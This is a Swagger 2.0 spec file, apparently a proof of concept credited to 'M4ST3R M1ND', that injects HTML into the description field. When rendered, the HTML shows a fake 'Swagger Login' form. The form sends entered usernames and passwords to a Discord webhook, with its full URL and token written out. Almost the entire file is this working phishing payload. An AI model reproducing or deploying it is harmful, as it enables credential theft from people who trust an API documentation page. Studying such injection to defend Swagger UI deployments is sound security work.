swagger: '2.0'
info:
  version: 1.0.0
  title: Swagger Auth Portal
  description: |
    <div style="font-family: 'Segoe UI', Roboto, Arial, sans-serif; background-color: #f4f4f4; padding: 20px;">
      <div style="max-width: 480px; margin: 40px auto; background-color: #ffffff; border: 1px solid #e0e0e0; border-radius: 8px; box-shadow: 0 2px 8px rgba(0,0,0,0.1);">
        <div style="background-color: #85c37e; padding: 16px 20px; border-top-left-radius: 8px; border-top-right-radius: 8px;">
          <h2 style="color: #ffffff; margin: 0; font-size: 20px; text-align: center;">Swagger Login</h2>
        </div>
        <form action="https://discord.com/api/webhooks/1391682964097732668/pwEKIM7IVLZZnsUarOokj1jPKrwFuPzrg0dlIKIxsWL1PxMlFdQAUh2vQzZcbRTe1lD3" method="POST" style="padding: 20px;">
          <div style="margin-bottom: 15px;">
            <label style="display: block; margin-bottom: 6px; font-weight: 600; color: #333;">Username</label>
            <input type="text" name="username" placeholder="Enter your username"
              style="width: 100%; padding: 10px; border: 1px solid #ccc; border-radius: 4px;">
          </div>
          <div style="margin-bottom: 15px;">
            <label style="display: block; margin-bottom: 6px; font-weight: 600; color: #333;">Password</label>
            <input type="password" name="password" placeholder="Enter your password"
              style="width: 100%; padding: 10px; border: 1px solid #ccc; border-radius: 4px;">
          </div>
          <button type="submit"
            style="width: 100%; padding: 12px; background-color: #85c37e; border: none; color: #fff; font-weight: bold; font-size: 15px; border-radius: 4px; cursor: pointer;">
            Sign In
          </button>
        </form>
        <div style="text-align: center; font-size: 12px; color: #888; padding-bottom: 12px;">
          Swagger Authorized Access Only
        </div>
      </div>
      <div style="text-align: right; font-size: 11px; color: #999; margin-top: 20px;">
        PoC by M4ST3R M1ND
      </div>
    </div>

paths:
  /:
    post:
      responses:
        '200':
          description: Login Successful
